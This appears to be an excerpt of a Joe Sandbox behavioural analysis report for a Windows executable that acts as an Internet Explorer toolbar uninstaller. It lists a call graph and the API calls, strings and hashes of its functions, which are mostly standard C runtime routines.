3819->3833 3820->3816 3820->3817 3822 71589a 3820->3822 3824 7131eb __calloc_impl 6 API calls 3820->3824 3826 715890 3820->3826 3823 712c72 __msize 66 API calls 3821->3823 3825 712c72 __msize 66 API calls 3822->3825 3822->3835 3823->3835 3824->3820 3827 7158a3 GetLastError 3825->3827 3829 712c72 __msize 66 API calls 3826->3829 3827->3835 3844 715811 3829->3844 3830 715769 HeapAlloc 3830->3833 3831 7157be HeapReAlloc 3831->3833 3832 715816 GetLastError 3832->3835 3833->3816 3833->3819 3833->3830 3833->3831 3834 714dc3 ___sbh_alloc_block 5 API calls 3833->3834 3833->3835 3836 715829 3833->3836 3837 7131eb __calloc_impl 6 API calls 3833->3837 3839 714614 VirtualFree VirtualFree HeapFree ___sbh_free_block 3833->3839 3841 71580c 3833->3841 3842 7137f0 __VEC_memcpy _realloc 3833->3842 3845 7157e1 3833->3845 3834->3833 3835->3803 3836->3835 3838 712c72 __msize 66 API calls 3836->3838 3837->3833 3840 715836 3838->3840 3839->3833 3840->3827 3840->3835 3843 712c72 __msize 66 API calls 3841->3843 3842->3833 3843->3844 3844->3832 3844->3835 3848 7129c6 LeaveCriticalSection 3845->3848 3847 7157e8 3847->3833 3848->3847 3852 7129c6 LeaveCriticalSection 3849->3852 3851 71148d 3851->3762 3852->3851 3854 711561 __msize 3853->3854 3855 712aa0 __lock 66 API calls 3854->3855 3856 711568 3855->3856 3857 711631 __initterm 3856->3857 3859 711594 3856->3859 3872 71166c 3857->3872 3861 7120f9 __decode_pointer 6 API calls 3859->3861 3863 71159f 3861->3863 3862 711669 __msize 3862->3329 3865 711621 __initterm 3863->3865 3867 7120f9 __decode_pointer 6 API calls 3863->3867 3865->3857 3866 711660 3868 711465 _doexit 3 API calls 3866->3868 3870 7115b4 3867->3870 3868->3862 3869 7120f0 6 API calls ___crtMessageBoxW 3869->3870 3870->3865 3870->3869 3871 7120f9 6 API calls __decode_pointer 3870->3871 3871->3870 3873 711672 3872->3873 3874 71164d 3872->3874 3877 7129c6 LeaveCriticalSection 3873->3877 3874->3862 3876 7129c6 LeaveCriticalSection 3874->3876 3876->3866 3877->3874 4139 714247 4149 7141cb 4139->4149 4142 714272 setSBCS 4143 7110cc __crtGetStringTypeA_stat 5 API calls 4142->4143 4144 71442a 4143->4144 4145 7142b6 IsValidCodePage 4145->4142 4146 7142c8 GetCPInfo 4145->4146 4146->4142 4147 7142db __setmbcp_nolock __crtGetStringTypeA_stat 4146->4147 4156 713f0d GetCPInfo 4147->4156 4166 714144 4149->4166 4152 714208 4154 71420d GetACP 4152->4154 4155 7141fa 4152->4155 4153 7141ea GetOEMCP 4153->4155 4154->4155 4155->4142 4155->4145 4155->4147 4157 713ff3 4156->4157 4161 713f41 __crtGetStringTypeA_stat 4156->4161 4160 7110cc __crtGetStringTypeA_stat 5 API calls 4157->4160 4164 71409e 4160->4164 4226 715fe2 4161->4226 4164->4147 4165 716415 ___crtLCMapStringA 101 API calls 4165->4157 4167 714157 4166->4167 4172 7141a4 4166->4172 4174 712345 4167->4174 4171 714184 4171->4172 4194 7140a0 4171->4194 4172->4152 4172->4153 4175 7122cc __getptd_noexit 66 API calls 4174->4175 4176 71234d 4175->4176 4177 71235a 4176->4177 4178 711411 __amsg_exit 66 API calls 4176->4178 4177->4171 4179 713e04 4177->4179 4178->4177 4180 713e10 __msize 4179->4180 4181 712345 __getptd 66 API calls 4180->4181 4182 713e15 4181->4182 4183 713e43 4182->4183 4185 713e27 4182->4185 4184 712aa0 __lock 66 API calls 4183->4184 4186 713e4a 4184->4186 4187 712345 __getptd 66 API calls 4185->4187 4210 713dc6 4186->4210 4189 713e2c 4187->4189 4191 713e3a __msize 4189->4191 4193 711411 __amsg_exit 66 API calls 4189->4193 4191->4171 4193->4191 4195 7140ac __msize 4194->4195 4196 712345 __getptd 66 API calls 4195->4196 4197 7140b1 4196->4197 4198 712aa0 __lock 66 API calls 4197->4198 4201 7140c3 4197->4201 4199 7140e1 4198->4199 4200 71412a 4199->4200 4202 714112 InterlockedIncrement 4199->4202 4203 7140f8 InterlockedDecrement 4199->4203 4222 71413b 4200->4222 4205 711411 __amsg_exit 66 API calls 4201->4205 4206 7140d1 __msize 4201->4206 4202->4200 4203->4202 4207 714103 4203->4207 4205->4206 4206->4172 4207->4202 4208 7135ee __crtGetStringTypeA_stat 66 API calls 4207->4208 4209 714111 4208->4209 4209->4202 4211 713dca 4210->4211 4217 713dfc 4210->4217 4212 713c9e ___addlocaleref 8 API calls 4211->4212 4211->4217 4213 713ddd 4212->4213 4214 713d2d ___removelocaleref 8 API calls 4213->4214 4213->4217 4215 713de8 4214->4215 4216 713b55 ___freetlocinfo 66 API calls 4215->4216 4215->4217 4216->4217 4218 713e6e 4217->4218 4221 7129c6 LeaveCriticalSection 4218->4221 4220 713e75 4220->4189 4221->4220 4225 7129c6 LeaveCriticalSection 4222->4225 4224 714142 4224->4201 4225->4224 4227 714144 _LocaleUpdate::_LocaleUpdate 76 API calls 4226->4227 4228 715ff5 4227->4228 4236 715e28 4228->4236 4231 716415 4232 714144 _LocaleUpdate::_LocaleUpdate 76 API calls 4231->4232 4233 716428 4232->4233 4324 716070 4233->4324 4237 715e74 4236->4237 4238 715e49 GetStringTypeW 4236->4238 4239 715f5b 4237->4239 4240 715e61 4237->4240 4238->4240 4241 715e69 GetLastError 4238->4241 4264 716b1a GetLocaleInfoA 4239->4264 4242 715ead MultiByteToWideChar 4240->4242 4253 715f55 4240->4253 4241->4237 4248 715eda 4242->4248 4242->4253 4244 7110cc __crtGetStringTypeA_stat 5 API calls 4246 713fae 4244->4246 4246->4231 4247 715fac GetStringTypeA 4252 715fc7 4247->4252 4247->4253 4249 7154b5 _malloc 66 API calls 4248->4249 4254 715eef __alloca_probe_16 __crtGetStringTypeA_stat 4248->4254 4249->4254 4251 715f28 MultiByteToWideChar 4256 715f4f 4251->4256 4257 715f3e GetStringTypeW 4251->4257 4258 7135ee __crtGetStringTypeA_stat 66 API calls 4252->4258 4253->4244 4254->4251 4254->4253 4260 715446 4256->4260 4257->4256 4258->4253 4261 715452 4260->4261 4262 715463 4260->4262 4261->4262 4263 7135ee __crtGetStringTypeA_stat 66 API calls 4261->4263 4262->4253 4263->4262 4265 716b48 4264->4265 4266 716b4d 4264->4266 4268 7110cc __crtGetStringTypeA_stat 5 API calls 4265->4268 4295 716b04 4266->4295 4269 715f7f 4268->4269 4269->4247 4269->4253 4270 716b63 4269->4270 4271 716ba3 GetCPInfo 4270->4271 4272 716c2d 4270->4272 4273 716c18 MultiByteToWideChar 4271->4273 4274 716bba 4271->4274 4275 7110cc __crtGetStringTypeA_stat 5 API calls 4272->4275 4273->4272 4279 716bd3 _strlen 4273->4279 4274->4273 4276 716bc0 GetCPInfo 4274->4276 4277 715fa0 4275->4277 4276->4273 4278 716bcd 4276->4278 4277->4247 4277->4253 4278->4273 4278->4279 4280 7154b5 _malloc 66 API calls 4279->4280 4284 716c05 __alloca_probe_16 __crtGetStringTypeA_stat 4279->4284 4280->4284 4281 716c62 MultiByteToWideChar 4282 716c99 4281->4282 4283 716c7a 4281->4283 4285 715446 __freea 66 API calls 4282->4285 4286 716c81 WideCharToMultiByte 4283->4286 4287 716c9e 4283->4287 4284->4272 4284->4281 4285->4272 4286->4282 4288 716ca9 WideCharToMultiByte 4287->4288 4289 716cbd 4287->4289 4288->4282 4288->4289 4290 713730 __calloc_crt 66 API calls 4289->4290 4291 716cc5 4290->4291 4291->4282 4292 716cce WideCharToMultiByte 4291->4292 4292->4282 4293 716ce0 4292->4293 4294 7135ee __crtGetStringTypeA_stat 66 API calls 4293->4294 4294->4282 4298 716f7a 4295->4298 4299 716f93 4298->4299 4302 716d4b 4299->4302 4303 714144 _LocaleUpdate::_LocaleUpdate 76 API calls 4302->4303 4305 716d60 4303->4305 4304 716d72 4306 712c72 __msize 66 API calls 4304->4306 4305->4304 4310 716daf 4305->4310 4307 716d77 4306->4307 4308 712c0a __msize 6 API calls 4307->4308 4313 716b15 4308->4313 4311 716df4 4310->4311 4314 7169e5 4310->4314 4312 712c72 __msize 66 API calls 4311->4312 4311->4313 4312->4313 4313->4265 4315 714144 _LocaleUpdate::_LocaleUpdate 76 API calls 4314->4315 4316 7169f9 4315->4316 4320 716a06 4316->4320 4321 716acc 4316->4321 4319 715fe2 ___crtGetStringTypeA 90 API calls 4319->4320 4320->4310 4322 714144 _LocaleUpdate::_LocaleUpdate 76 API calls 4321->4322 4323 716a2e 4322->4323 4323->4319 4325 716091 LCMapStringW 4324->4325 4328 7160ac 4324->4328 4326 7160b4 GetLastError 4325->4326 4325->4328 4326->4328 4327 7162aa 4331 716b1a ___ansicp 90 API calls 4327->4331 4328->4327 4329 716106 4328->4329 4330 71611f MultiByteToWideChar 4329->4330 4354 7162a1 4329->4354 4338 71614c 4330->4338 4330->4354 4333 7162d2 4331->4333 4332 7110cc __crtGetStringTypeA_stat 5 API calls 4334 713fce 4332->4334 4335 7163c6 LCMapStringA 4333->4335 4336 7162eb 4333->4336 4333->4354 4334->4165 4339 716322 4335->4339 4340 716b63 ___convertcp 73 API calls 4336->4340 4337 71619d MultiByteToWideChar 4341 7161b6 LCMapStringW 4337->4341 4342 716298 4337->4342 4344 7154b5 _malloc 66 API calls 4338->4344 4351 716165 __alloca_probe_16 4338->4351 4343 7163ed 4339->4343 4347 7135ee __crtGetStringTypeA_stat 66 API calls 4339->4347 4345 7162fd 4340->4345 4341->4342 4346 7161d7 4341->4346 4349 715446 __freea 66 API calls 4342->4349 4352 7135ee __crtGetStringTypeA_stat 66 API calls 4343->4352 4343->4354 4344->4351 4348 716307 LCMapStringA 4345->4348 4345->4354 4350 7161e0 4346->4350 4357 716209 4346->4357 4347->4343 4348->4339 4355 716329 4348->4355 4349->4354 4350->4342 4353 7161f2 LCMapStringW 4350->4353 4351->4337 4351->4354 4352->4354 4353->4342 4354->4332 4358 71633a __alloca_probe_16 __crtGetStringTypeA_stat 4355->4358 4359 7154b5 _malloc 66 API calls 4355->4359 4356 716258 LCMapStringW 4360 716270 WideCharToMultiByte 4356->4360 4361 716292 4356->4361 4362 716224 __alloca_probe_16 4357->4362 4363 7154b5 _malloc 66 API calls 4357->4363 4358->4339 4365 716378 LCMapStringA 4358->4365 4359->4358 4360->4361 4364 715446 __freea 66 API calls 4361->4364 4362->4342 4362->4356 4363->4362 4364->4342 4367 716394 4365->4367 4368 716398 4365->4368 4370 715446 __freea 66 API calls 4367->4370 4369 716b63 ___convertcp 73 API calls 4368->4369 4369->4367 4370->4339 4371 7167c8 RtlUnwind 4427 71458d 4430 7129c6 LeaveCriticalSection 4427->4430 4429 714594 4430->4429 4404 71122e 4407 7118fe 4404->4407 4408 7122cc __getptd_noexit 66 API calls 4407->4408 4409 71123f 4408->4409

                                                Executed Functions

                                                Function 00711000 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 73libraryloadersynchronizationCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 00711006
                                                • CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 00711013
                                                • GetLastError.KERNEL32 ref: 0071101F
                                                • GetCommandLineW.KERNEL32(?), ref: 00711040
                                                • CommandLineToArgvW.SHELL32(00000000), ref: 00711047
                                                • PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 00711061
                                                • PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 00711073
                                                • LoadLibraryW.KERNELBASE(?), ref: 00711085
                                                • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00711097
                                                • FreeLibrary.KERNELBASE(00000000), ref: 007110A4
                                                • CloseHandle.KERNELBASE(00000000), ref: 007110AB
                                                • CoUninitialize.COMBASE ref: 007110B1
                                                • LocalFree.KERNEL32(00000000), ref: 007110BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000029.00000002.3482394324.0000000000711000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00710000, based on PE: true
                                                • Associated: 00000029.00000002.3482324357.0000000000710000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3482826484.000000000071A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3483013696.000000000071C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_41_2_710000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
                                                • API String ID: 474438367-4110843154
                                                • Opcode ID: 436e64001422df092c7bb7c8ca7d0d67f732d3ea0f41b99828173f632dcc0220
                                                • Instruction ID: 814ff760058c00cb76301f16e0c5bfadb23a36d2d58c356ce0fe1f8c53a60962
                                                • Opcode Fuzzy Hash: 436e64001422df092c7bb7c8ca7d0d67f732d3ea0f41b99828173f632dcc0220
                                                • Instruction Fuzzy Hash: 7511D232A05259EB83609B6CAC48ADB3758FB4C751701C529F642D60D0DF6DC986C6BB
                                                Function 00711465 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 16 711465-711476 call 71143a ExitProcess
                                                APIs
                                                • ___crtCorExitProcess.LIBCMT ref: 0071146D
                                                  • Part of subcall function 0071143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,00711472,?,?,007154EE,000000FF,0000001E,?,007136FC,?,00000001,?,?,00712A2A,00000018), ref: 00711444
                                                  • Part of subcall function 0071143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00711454
                                                • ExitProcess.KERNEL32 ref: 00711476
                                                Memory Dump Source
                                                • Source File: 00000029.00000002.3482394324.0000000000711000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00710000, based on PE: true
                                                • Associated: 00000029.00000002.3482324357.0000000000710000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3482826484.000000000071A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3483013696.000000000071C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_41_2_710000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                • String ID:
                                                • API String ID: 2427264223-0
                                                • Opcode ID: 104446178f49452becf0f638dc357cdae872347aaefbf0a95dc39e4d96f5c575
                                                • Instruction ID: a7e9ef55239d8c2d10039e559b594f77c36eacc5121e2438a83f5e6810431cc2
                                                • Opcode Fuzzy Hash: 104446178f49452becf0f638dc357cdae872347aaefbf0a95dc39e4d96f5c575
                                                • Instruction Fuzzy Hash: B6B0923100014CFBDB022F1ADC0E88D3F2AFB807A0BA0C020F908490B1DF76AD929A95
                                                Function 0071261B Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 19 71261b-71263d HeapCreate 20 712641-71264a 19->20 21 71263f-712640 19->21
                                                APIs
                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00712630
                                                Memory Dump Source
                                                • Source File: 00000029.00000002.3482394324.0000000000711000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00710000, based on PE: true
                                                • Associated: 00000029.00000002.3482324357.0000000000710000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3482826484.000000000071A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3483013696.000000000071C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_41_2_710000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: CreateHeap
                                                • String ID:
                                                • API String ID: 10892065-0
                                                • Opcode ID: ac42449d4e93016a5d5476e31aa6379dedde12fe91ea85bb86f1bab9b4a611f7
                                                • Instruction ID: b9c976a3eaf4b8c7eba44132b7b63c4db75da95df30f449b456b5d7612dbad57
                                                • Opcode Fuzzy Hash: ac42449d4e93016a5d5476e31aa6379dedde12fe91ea85bb86f1bab9b4a611f7
                                                • Instruction Fuzzy Hash: D7D05E32A543889EDB405F796C087A23BDCD384395F10C436B90CC61D1E678C6918A08
                                                Function 00711681 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 22 711681-71168d call 711555 24 711692-711696 22->24
                                                APIs
                                                • _doexit.LIBCMT ref: 0071168D
                                                  • Part of subcall function 00711555: __lock.LIBCMT ref: 00711563
                                                  • Part of subcall function 00711555: __decode_pointer.LIBCMT ref: 0071159A
                                                  • Part of subcall function 00711555: __decode_pointer.LIBCMT ref: 007115AF
                                                  • Part of subcall function 00711555: __decode_pointer.LIBCMT ref: 007115D9
                                                  • Part of subcall function 00711555: __decode_pointer.LIBCMT ref: 007115EF
                                                  • Part of subcall function 00711555: __decode_pointer.LIBCMT ref: 007115FC
                                                  • Part of subcall function 00711555: __initterm.LIBCMT ref: 0071162B
                                                  • Part of subcall function 00711555: __initterm.LIBCMT ref: 0071163B
                                                Memory Dump Source
                                                • Source File: 00000029.00000002.3482394324.0000000000711000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00710000, based on PE: true
                                                • Associated: 00000029.00000002.3482324357.0000000000710000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3482826484.000000000071A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3483013696.000000000071C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_41_2_710000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: __decode_pointer$__initterm$__lock_doexit
                                                • String ID:
                                                • API String ID: 1597249276-0
                                                • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                • Instruction ID: d276b4340be49223cc77b4be538260ff7967a89cb2e5c9cf61ed0c2443e47d19
                                                • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                • Instruction Fuzzy Hash: 4EB0123258030C73DB20258AEC07F463F1E87C0BA4F650020FB0C1D1F1A9A3B9B180CA

                                                Non-executed Functions

                                                Function 007110CC Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 00711346
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0071135B
                                                • UnhandledExceptionFilter.KERNEL32(0071816C), ref: 00711366
                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00711382
                                                • TerminateProcess.KERNEL32(00000000), ref: 00711389
                                                Memory Dump Source
                                                • Source File: 00000029.00000002.3482394324.0000000000711000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00710000, based on PE: true
                                                • Associated: 00000029.00000002.3482324357.0000000000710000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3482826484.000000000071A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3483013696.000000000071C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_41_2_710000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                • String ID:
                                                • API String ID: 2579439406-0
                                                • Opcode ID: dfbd9b6c14d0c4c7c310279ca3163dc71817240ad5be03f498e1d85098bcd809
                                                • Instruction ID: 2c6f5c772727e1a77f504da246d0228678b2a99c8e8c5a83320fc1569c73273c
                                                • Opcode Fuzzy Hash: dfbd9b6c14d0c4c7c310279ca3163dc71817240ad5be03f498e1d85098bcd809
                                                • Instruction Fuzzy Hash: DD21EFB4A02A08EFCB51DF2CFD456D43BB0BB08352B40C01AE54886AE5EB7C5985CB5F
                                                Function 007121E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00719458,0000000C,00712320,00000000,00000000,?,0071174F,00000003,?,?,?,?,?,?,007110F6), ref: 007121F7
                                                • __crt_waiting_on_module_handle.LIBCMT ref: 00712202
                                                  • Part of subcall function 007113E1: Sleep.KERNEL32(000003E8,00000000,?,00712148,KERNEL32.DLL,?,00712194,?,0071174F,00000003), ref: 007113ED
                                                  • Part of subcall function 007113E1: GetModuleHandleW.KERNEL32(?,?,00712148,KERNEL32.DLL,?,00712194,?,0071174F,00000003,?,?,?,?,?,?,007110F6), ref: 007113F6
                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0071222B
                                                • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0071223B
                                                • __lock.LIBCMT ref: 0071225D
                                                • InterlockedIncrement.KERNEL32(0071A4D8), ref: 0071226A
                                                • __lock.LIBCMT ref: 0071227E
                                                • ___addlocaleref.LIBCMT ref: 0071229C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000029.00000002.3482394324.0000000000711000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00710000, based on PE: true
                                                • Associated: 00000029.00000002.3482324357.0000000000710000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3482826484.000000000071A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3483013696.000000000071C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_41_2_710000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                • API String ID: 1028249917-2843748187
                                                • Opcode ID: 3992cd856302958faa39ab3caf54851ed09449665e9e5c2d92852413fa9ee823
                                                • Instruction ID: 6015eba37c5c271b2f8a79cfabeef463cf08c8f0235b6de395fa68d7552e2e0d
                                                • Opcode Fuzzy Hash: 3992cd856302958faa39ab3caf54851ed09449665e9e5c2d92852413fa9ee823
                                                • Instruction Fuzzy Hash: 0711A570940701DEE760AF7DD849BCEBBE0AF14310F208519E499936E1CB7C96928B65
                                                Function 007140A0 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 170 7140a0-7140bb call 71264c call 712345 175 7140da-7140f2 call 712aa0 170->175 176 7140bd-7140c1 170->176 181 7140f4-7140f6 175->181 182 71412a-714136 call 71413b 175->182 176->175 178 7140c3 176->178 180 7140c6-7140c8 178->180 183 7140d2-7140d9 call 712691 180->183 184 7140ca-7140d1 call 711411 180->184 185 714112-714124 InterlockedIncrement 181->185 186 7140f8-714101 InterlockedDecrement 181->186 182->180 184->183 185->182 186->185 190 714103-714109 186->190 190->185 194 71410b-714111 call 7135ee 190->194 194->185
                                                APIs
                                                • __getptd.LIBCMT ref: 007140AC
                                                  • Part of subcall function 00712345: __getptd_noexit.LIBCMT ref: 00712348
                                                  • Part of subcall function 00712345: __amsg_exit.LIBCMT ref: 00712355
                                                • __amsg_exit.LIBCMT ref: 007140CC
                                                • __lock.LIBCMT ref: 007140DC
                                                • InterlockedDecrement.KERNEL32(?), ref: 007140F9
                                                • InterlockedIncrement.KERNEL32(02762B98), ref: 00714124
                                                Memory Dump Source
                                                • Source File: 00000029.00000002.3482394324.0000000000711000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00710000, based on PE: true
                                                • Associated: 00000029.00000002.3482324357.0000000000710000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3482826484.000000000071A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3483013696.000000000071C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_41_2_710000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                • String ID:
                                                • API String ID: 4271482742-0
                                                • Opcode ID: 0e6624ccf5dff9bdc4faa3411fd74ce1828cbe7e52c2a8192f27d5539eb30b67
                                                • Instruction ID: 6c61644db7919abef0249c91b462ff0b488348620ce8eca8f5bd13e060ddc0bc
                                                • Opcode Fuzzy Hash: 0e6624ccf5dff9bdc4faa3411fd74ce1828cbe7e52c2a8192f27d5539eb30b67
                                                • Instruction Fuzzy Hash: 99016131902615EBCB61AF2D980A7DD7360BF14B60F15C055E900A76D1CB3CA9D2DBD6
                                                Function 007135EE Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 197 7135ee-7135ff call 71264c 200 713601-713608 197->200 201 713676-71367b call 712691 197->201 202 71360a-713622 call 712aa0 call 7145e4 200->202 203 71364d 200->203 215 713624-71362c call 714614 202->215 216 71362d-71363d call 713644 202->216 205 71364e-71365e HeapFree 203->205 205->201 208 713660-713675 call 712c72 GetLastError call 712c30 205->208 208->201 215->216 216->201 222 71363f-713642 216->222 222->205
                                                APIs
                                                • __lock.LIBCMT ref: 0071360C
                                                  • Part of subcall function 00712AA0: __mtinitlocknum.LIBCMT ref: 00712AB6
                                                  • Part of subcall function 00712AA0: __amsg_exit.LIBCMT ref: 00712AC2
                                                  • Part of subcall function 00712AA0: EnterCriticalSection.KERNEL32(?,?,?,00715600,00000004,00719628,0000000C,00713746,?,?,00000000,00000000,00000000,?,007122F7,00000001), ref: 00712ACA
                                                • ___sbh_find_block.LIBCMT ref: 00713617
                                                • ___sbh_free_block.LIBCMT ref: 00713626
                                                • HeapFree.KERNEL32(00000000,?,00719568,0000000C,00712A81,00000000,007194C8,0000000C,00712ABB,?,?,?,00715600,00000004,00719628,0000000C), ref: 00713656
                                                • GetLastError.KERNEL32(?,00715600,00000004,00719628,0000000C,00713746,?,?,00000000,00000000,00000000,?,007122F7,00000001,00000214), ref: 00713667
                                                Memory Dump Source
                                                • Source File: 00000029.00000002.3482394324.0000000000711000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00710000, based on PE: true
                                                • Associated: 00000029.00000002.3482324357.0000000000710000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3482826484.000000000071A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000029.00000002.3483013696.000000000071C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_41_2_710000_G5CQjd.jbxd
                                                Similarity
                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                • String ID:
                                                • API String ID: 2714421763-0
                                                • Opcode ID: f201788023439613b148c2c2085ca750af5791352b19563ff4294978c657062f
                                                • Instruction ID: a9c0ccd19e66ade26344c95fcf1202c106190d47fe4ce82961f0c3804088a174
                                                • Opcode Fuzzy Hash: f201788023439613b148c2c2085ca750af5791352b19563ff4294978c657062f
                                                • Instruction Fuzzy Hash: 91016271D04305FADB206F7D9C0ABDD7A64AF11761F608019F504661D2CB3C8AD1CA99
                                                Function 00713E04 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 223 713e04-713e1f call 71264c call 712345 228 713e21-713e25 223->228 229 713e43-713e6c call 712aa0 call 713dc6 call 713e6e 223->229 228->229 231 713e27-713e2c call 712345 228->231 237 713e2f-713e31 229->237 231->237 238 713e33-713e3a call 711411 237->238 239 713e3b-713e42 call 712691 237->239 238->239
                                                APIs
                                                • __getptd.LIBCMT ref: 00713E10
                                                  • Part of subcall function 00712345: __getptd_noexit.LIBCMT ref: 00712348
                                                  • Part of subcall function 00712345: __amsg_exit.LIBCMT ref: 00712355
                                                • __getptd.LIBCMT ref: 00713E27
                                                • __amsg_exit.LIBCMT ref: 00713E35
